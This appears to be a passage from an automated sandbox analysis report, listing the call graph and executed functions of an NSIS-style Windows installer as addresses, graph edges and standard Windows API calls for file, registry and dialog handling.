405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3966 403c83 3640->3966 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4023 406009 lstrcpynW 3651->4023 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4024 405e50 GetFileAttributesW CreateFileW 3674->4024 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4027 406009 lstrcpynW 3684->4027 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4025 405f51 wsprintfW 3696->4025 4026 406009 lstrcpynW 3696->4026 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4028 406a99 lstrcpyW 3704->4028 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3965 406009 lstrcpynW 3820->3965 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3915 40160c 3834->3915 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3915 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3942 40145c 3842->3942 3859 40145c 18 API calls 3843->3859 3957 401446 3844->3957 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3915 3847->3915 3964 405f51 wsprintfW 3847->3964 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3915 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3915 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3915 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3915 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3915 3879 4062a3 11 API calls 3868->3879 3869->3915 3870->3915 3871->3915 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3960 4062d5 FindFirstFileW 3874->3960 3885 40197f 3875->3885 3928 4019a1 3875->3928 3877 40169a 3887 4062a3 11 API calls 3877->3887 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3910 4062d5 2 API calls 3885->3910 3885->3928 3895 4016a7 3887->3895 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3915 3908 404f72 25 API calls 3892->3908 3904 4016b1 Sleep 3895->3904 3905 4016ae 3895->3905 3896 4019b8 GetShortPathNameW 3896->3915 3906 4018f5 3897->3906 3898->3915 3899->3915 3907 4062a3 11 API calls 3900->3907 3901 4018c2 3911 4062a3 11 API calls 3901->3911 3902 4018a9 3909 4062a3 11 API calls 3902->3909 3904->3915 3905->3904 3913 4062a3 11 API calls 3906->3913 3907->3915 3908->3915 3909->3915 3914 401991 3910->3914 3911->3915 3912 4017d4 3916 401864 3912->3916 3919 405d06 CharNextW 3912->3919 3937 4062a3 11 API calls 3912->3937 3917 401902 MoveFileW 3913->3917 3914->3928 3963 406009 lstrcpynW 3914->3963 3915->3832 3916->3892 3918 40186e 3916->3918 3920 401912 3917->3920 3921 40191e 3917->3921 3922 404f72 25 API calls 3918->3922 3924 4017e6 CreateDirectoryW 3919->3924 3920->3892 3926 401942 3921->3926 3931 4062d5 2 API calls 3921->3931 3927 401875 3922->3927 3924->3912 3925 4017fe GetLastError 3924->3925 3929 401827 GetFileAttributesW 3925->3929 3930 40180b GetLastError 3925->3930 3936 4062a3 11 API calls 3926->3936 3956 406009 lstrcpynW 3927->3956 3928->3896 3928->3915 3929->3912 3933 4062a3 11 API calls 3930->3933 3934 401929 3931->3934 3933->3912 3934->3926 3939 406c68 42 API calls 3934->3939 3935 401882 SetCurrentDirectoryW 3935->3915 3938 40195c 3936->3938 3937->3912 3938->3915 3940 401936 3939->3940 3941 404f72 25 API calls 3940->3941 3941->3926 3943 406805 18 API calls 3942->3943 3944 401488 3943->3944 3945 401497 3944->3945 3946 406038 5 API calls 3944->3946 3947 4062a3 lstrlenW wvsprintfW 3945->3947 3946->3945 3948 4060e7 9 API calls 3947->3948 3949 4017c9 3948->3949 3950 405d59 CharNextW CharNextW 3949->3950 3951 405d76 3950->3951 3954 405d88 3950->3954 3953 405d83 CharNextW 3951->3953 3951->3954 3952 405dac 3952->3912 3953->3952 3954->3952 3955 405d06 CharNextW 3954->3955 3955->3954 3956->3935 3958 406805 18 API calls 3957->3958 3959 401455 3958->3959 3959->3877 3961 4018a5 3960->3961 3962 4062eb FindClose 3960->3962 3961->3901 3961->3902 3962->3961 3963->3928 3964->3915 3965->3822 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 CoUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3653 4024->3677 4025->3696 4026->3696 4027->3685 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3706 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4941 402a84 4942 401553 19 API calls 4941->4942 4943 402a8e 4942->4943 4944 401446 18 API calls 4943->4944 4945 402a98 4944->4945 4946 401a13 4945->4946 4947 402ab2 RegEnumKeyW 4945->4947 4948 402abe RegEnumValueW 4945->4948 4949 402a7e 4947->4949 4948->4946 4948->4949 4949->4946 4950 4029e4 RegCloseKey 4949->4950 4950->4946 4951 402c8a 4952 402ca2 4951->4952 4953 402c8f 4951->4953 4955 40145c 18 API calls 4952->4955 4954 401446 18 API calls 4953->4954 4957 402c97 4954->4957 4956 402ca9 lstrlenW 4955->4956 4956->4957 4958 402ccb WriteFile 4957->4958 4959 401a13 4957->4959 4958->4959 4960 40400d 4961 40406a 4960->4961 4962 40401a lstrcpynA lstrlenA 4960->4962 4962->4961 4963 40404b 4962->4963 4963->4961 4964 404057 GlobalFree 4963->4964 4964->4961 4965 401d8e 4966 40145c 18 API calls 4965->4966 4967 401d95 ExpandEnvironmentStringsW 4966->4967 4968 401da8 4967->4968 4970 401db9 4967->4970 4969 401dad lstrcmpW 4968->4969 4968->4970 4969->4970 4971 401e0f 4972 401446 18 API calls 4971->4972 4973 401e17 4972->4973 4974 401446 18 API calls 4973->4974 4975 401e21 4974->4975 4976 4030e3 4975->4976 4978 405f51 wsprintfW 4975->4978 4978->4976 4979 402392 4980 40145c 18 API calls 4979->4980 4981 402399 4980->4981 4984 4071f8 4981->4984 4985 406ed2 25 API calls 4984->4985 4986 407218 4985->4986 4987 407222 lstrcpynW lstrcmpW 4986->4987 4988 4023a7 4986->4988 4989 407254 4987->4989 4990 40725a lstrcpynW 4987->4990 4989->4990 4990->4988 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4991 402797 4992 40145c 18 API calls 4991->4992 4993 4027ae 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027b7 4994->4995 4996 40145c 18 API calls 4995->4996 4997 4027c0 GetPrivateProfileStringW lstrcmpW 4996->4997 4998 402e18 4999 40145c 18 API calls 4998->4999 5000 402e1f FindFirstFileW 4999->5000 5001 402e32 5000->5001 5006 405f51 wsprintfW 5001->5006 5003 402e43 5007 406009 lstrcpynW 5003->5007 5005 402e50 5006->5003 5007->5005 5008 401e9a 5009 40145c 18 API calls 5008->5009 5010 401ea1 5009->5010 5011 401446 18 API calls 5010->5011 5012 401eab wsprintfW 5011->5012 4288 401a1f 4289 40145c 18 API calls 4288->4289 4290 401a26 4289->4290 4291 4062a3 11 API calls 4290->4291 4292 401a49 4291->4292 4293 401a64 4292->4293 4294 401a5c 4292->4294 4342 406009 lstrcpynW 4293->4342 4341 406009 lstrcpynW 4294->4341 4297 401a62 4301 406038 5 API calls 4297->4301 4298 401a6f 4299 406722 3 API calls 4298->4299 4300 401a75 lstrcatW 4299->4300 4300->4297 4303 401a81 4301->4303 4302 4062d5 2 API calls 4302->4303 4303->4302 4304 405e30 2 API calls 4303->4304 4306 401a98 CompareFileTime 4303->4306 4307 401ba9 4303->4307 4311 4062a3 11 API calls 4303->4311 4315 406009 lstrcpynW 4303->4315 4321 406805 18 API calls 4303->4321 4328 405ca0 MessageBoxIndirectW 4303->4328 4332 401b50 4303->4332 4339 401b5d 4303->4339 4340 405e50 GetFileAttributesW CreateFileW 4303->4340 4304->4303 4306->4303 4308 404f72 25 API calls 4307->4308 4310 401bb3 4308->4310 4309 404f72 25 API calls 4312 401b70 4309->4312 4313 40337f 37 API calls 4310->4313 4311->4303 4316 4062a3 11 API calls 4312->4316 4314 401bc6 4313->4314 4317 4062a3 11 API calls 4314->4317 4315->4303 4323 401b8b 4316->4323 4318 401bda 4317->4318 4319 401be9 SetFileTime 4318->4319 4320 401bf8 CloseHandle 4318->4320 4319->4320 4322 401c09 4320->4322 4320->4323 4321->4303 4324 401c21 4322->4324 4325 401c0e 4322->4325 4327 406805 18 API calls 4324->4327 4326 406805 18 API calls 4325->4326 4329 401c16 lstrcatW 4326->4329 4330 401c29 4327->4330 4328->4303 4329->4330 4331 4062a3 11 API calls 4330->4331 4333 401c34 4331->4333 4334 401b93 4332->4334 4335 401b53 4332->4335 4336 405ca0 MessageBoxIndirectW 4333->4336 4337 4062a3 11 API calls 4334->4337 4338 4062a3 11 API calls 4335->4338 4336->4323 4337->4323 4338->4339 4339->4309 4340->4303 4341->4297 4342->4298 5013 40209f GetDlgItem GetClientRect 5014 40145c 18 API calls 5013->5014 5015 4020cf LoadImageW SendMessageW 5014->5015 5016 4030e3 5015->5016 5017 4020ed DeleteObject 5015->5017 5017->5016 5018 402b9f 5019 401446 18 API calls 5018->5019 5024 402ba7 5019->5024 5020 402c4a 5021 402bdf ReadFile 5023 402c3d 5021->5023 5021->5024 5022 401446 18 API calls 5022->5023 5023->5020 5023->5022 5030 402d17 ReadFile 5023->5030 5024->5020 5024->5021 5024->5023 5025 402c06 MultiByteToWideChar 5024->5025 5026 402c3f 5024->5026 5028 402c4f 5024->5028 5025->5024 5025->5028 5031 405f51 wsprintfW 5026->5031 5028->5023 5029 402c6b SetFilePointer 5028->5029 5029->5023 5030->5023 5031->5020 5032 402b23 GlobalAlloc 5033 402b39 5032->5033 5034 402b4b 5032->5034 5035 401446 18 API calls 5033->5035 5036 40145c 18 API calls 5034->5036 5037 402b41 5035->5037 5038 402b52 WideCharToMultiByte lstrlenA 5036->5038 5039 402b93 5037->5039 5040 402b84 WriteFile 5037->5040 5038->5037 5040->5039 5041 402384 GlobalFree 5040->5041 5041->5039 5043 4044a5 5044 404512 5043->5044 5045 4044df 5043->5045 5047 40451f GetDlgItem GetAsyncKeyState 5044->5047 5054 4045b1 5044->5054 5111 405c84 GetDlgItemTextW 5045->5111 5050 40453e GetDlgItem 5047->5050 5057 40455c 5047->5057 5048 4044ea 5051 406038 5 API calls 5048->5051 5049 40469d 5109 404833 5049->5109 5113 405c84 GetDlgItemTextW 5049->5113 5052 403d3f 19 API calls 5050->5052 5053 4044f0 5051->5053 5056 404551 ShowWindow 5052->5056 5059 403e74 5 API calls 5053->5059 5054->5049 5060 406805 18 API calls 5054->5060 5054->5109 5056->5057 5062 404579 SetWindowTextW 5057->5062 5067 405d59 4 API calls 5057->5067 5058 403dca 8 API calls 5063 404847 5058->5063 5064 4044f5 GetDlgItem 5059->5064 5065 40462f SHBrowseForFolderW 5060->5065 5061 4046c9 5066 40677e 18 API calls 5061->5066 5068 403d3f 19 API calls 5062->5068 5069 404503 IsDlgButtonChecked 5064->5069 5064->5109 5065->5049 5070 404647 CoTaskMemFree 5065->5070 5071 4046cf 5066->5071 5072 40456f 5067->5072 5073 404597 5068->5073 5069->5044 5074 406722 3 API calls 5070->5074 5114 406009 lstrcpynW 5071->5114 5072->5062 5078 406722 3 API calls 5072->5078 5075 403d3f 19 API calls 5073->5075 5076 404654 5074->5076 5079 4045a2 5075->5079 5080 40468b SetDlgItemTextW 5076->5080 5085 406805 18 API calls 5076->5085 5078->5062 5112 403d98 SendMessageW 5079->5112 5080->5049 5081 4046e6 5083 4062fc 3 API calls 5081->5083 5092 4046ee 5083->5092 5084 4045aa 5088 4062fc 3 API calls 5084->5088 5086 404673 lstrcmpiW 5085->5086 5086->5080 5089 404684 lstrcatW 5086->5089 5087 404730 5115 406009 lstrcpynW 5087->5115 5088->5054 5089->5080 5091 404739 5093 405d59 4 API calls 5091->5093 5092->5087 5097 406751 2 API calls 5092->5097 5098 404785 5092->5098 5094 40473f GetDiskFreeSpaceW 5093->5094 5096 404763 MulDiv 5094->5096 5094->5098 5096->5098 5097->5092 5100 4047e2 5098->5100 5101 4043ad 21 API calls 5098->5101 5099 404805 5116 403d85 KiUserCallbackDispatcher 5099->5116 5100->5099 5102 40141d 80 API calls 5100->5102 5103 4047d3 5101->5103 5102->5099 5105 4047e4 SetDlgItemTextW 5103->5105 5106 4047d8 5103->5106 5105->5100 5107 4043ad 21 API calls 5106->5107 5107->5100 5108 404821 5108->5109 5117 403d61 5108->5117 5109->5058 5111->5048 5112->5084 5113->5061 5114->5081 5115->5091 5116->5108 5118 403d74 SendMessageW 5117->5118 5119 403d6f 5117->5119 5118->5109 5119->5118 5120 402da5 5121 4030e3 5120->5121 5122 402dac 5120->5122 5123 401446 18 API calls 5122->5123 5124 402db8 5123->5124 5125 402dbf SetFilePointer 5124->5125 5125->5121 5126 402dcf 5125->5126 5126->5121 5128 405f51 wsprintfW 5126->5128 5128->5121 5129 4030a9 SendMessageW 5130 4030c2 InvalidateRect 5129->5130 5131 4030e3 5129->5131 5130->5131 5132 401cb2 5133 40145c 18 API calls 5132->5133 5134 401c54 5133->5134 5135 4062a3 11 API calls 5134->5135 5138 401c64 5134->5138 5136 401c59 5135->5136 5137 406c9b 81 API calls 5136->5137 5137->5138 4088 4021b5 4089 40145c 18 API calls 4088->4089 4090 4021bb 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021c4 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021cd 4093->4094 4095 40145c 18 API calls 4094->4095 4096 4021d6 4095->4096 4097 404f72 25 API calls 4096->4097 4098 4021e2 ShellExecuteW 4097->4098 4099 40221b 4098->4099 4100 40220d 4098->4100 4102 4062a3 11 API calls 4099->4102 4101 4062a3 11 API calls 4100->4101 4101->4099 4103 402230 4102->4103 5146 402238 5147 40145c 18 API calls 5146->5147 5148 40223e 5147->5148 5149 4062a3 11 API calls 5148->5149 5150 40224b 5149->5150 5151 404f72 25 API calls 5150->5151 5152 402255 5151->5152 5153 405c3f 2 API calls 5152->5153 5154 40225b 5153->5154 5155 4062a3 11 API calls 5154->5155 5158 4022ac CloseHandle 5154->5158 5161 40226d 5155->5161 5157 4030e3 5158->5157 5159 402283 WaitForSingleObject 5160 402291 GetExitCodeProcess 5159->5160 5159->5161 5160->5158 5163 4022a3 5160->5163 5161->5158 5161->5159 5162 406332 2 API calls 5161->5162 5162->5159 5165 405f51 wsprintfW 5163->5165 5165->5158 5166 4040b8 5167 4040d3 5166->5167 5175 404201 5166->5175 5171 40410e 5167->5171 5197 403fca WideCharToMultiByte 5167->5197 5168 40426c 5169 404276 GetDlgItem 5168->5169 5170 40433e 5168->5170 5172 404290 5169->5172 5173 4042ff 5169->5173 5176 403dca 8 API calls 5170->5176 5178 403d3f 19 API calls 5171->5178 5172->5173 5181 4042b6 6 API calls 5172->5181 5173->5170 5182 404311 5173->5182 5175->5168 5175->5170 5177 40423b GetDlgItem SendMessageW 5175->5177 5180 404339 5176->5180 5202 403d85 KiUserCallbackDispatcher 5177->5202 5179 40414e 5178->5179 5184 403d3f 19 API calls 5179->5184 5181->5173 5185 404327 5182->5185 5186 404317 SendMessageW 5182->5186 5189 40415b CheckDlgButton 5184->5189 5185->5180 5190 40432d SendMessageW 5185->5190 5186->5185 5187 404267 5188 403d61 SendMessageW 5187->5188 5188->5168 5200 403d85 KiUserCallbackDispatcher 5189->5200 5190->5180 5192 404179 GetDlgItem 5201 403d98 SendMessageW 5192->5201 5194 40418f SendMessageW 5195 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5194->5195 5196 4041ac GetSysColor 5194->5196 5195->5180 5196->5195 5198 404007 5197->5198 5199 403fe9 GlobalAlloc WideCharToMultiByte 5197->5199 5198->5171 5199->5198 5200->5192 5201->5194 5202->5187 4197 401eb9 4198 401f24 4197->4198 4199 401ec6 4197->4199 4200 401f53 GlobalAlloc 4198->4200 4201 401f28 4198->4201 4202 401ed5 4199->4202 4209 401ef7 4199->4209 4203 406805 18 API calls 4200->4203 4208 4062a3 11 API calls 4201->4208 4213 401f36 4201->4213 4204 4062a3 11 API calls 4202->4204 4207 401f46 4203->4207 4205 401ee2 4204->4205 4210 402708 4205->4210 4215 406805 18 API calls 4205->4215 4207->4210 4211 402387 GlobalFree 4207->4211 4208->4213 4219 406009 lstrcpynW 4209->4219 4211->4210 4221 406009 lstrcpynW 4213->4221 4214 401f06 4220 406009 lstrcpynW 4214->4220 4215->4205 4217 401f15 4222 406009 lstrcpynW 4217->4222 4219->4214 4220->4217 4221->4207 4222->4210 5203 4074bb 5205 407344 5203->5205 5204 407c6d 5205->5204 5206 4073c2 GlobalFree 5205->5206 5207 4073cb GlobalAlloc 5205->5207 5208 407443 GlobalAlloc 5205->5208 5209 40743a GlobalFree 5205->5209 5206->5207 5207->5204 5207->5205 5208->5204 5208->5205 5209->5208

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 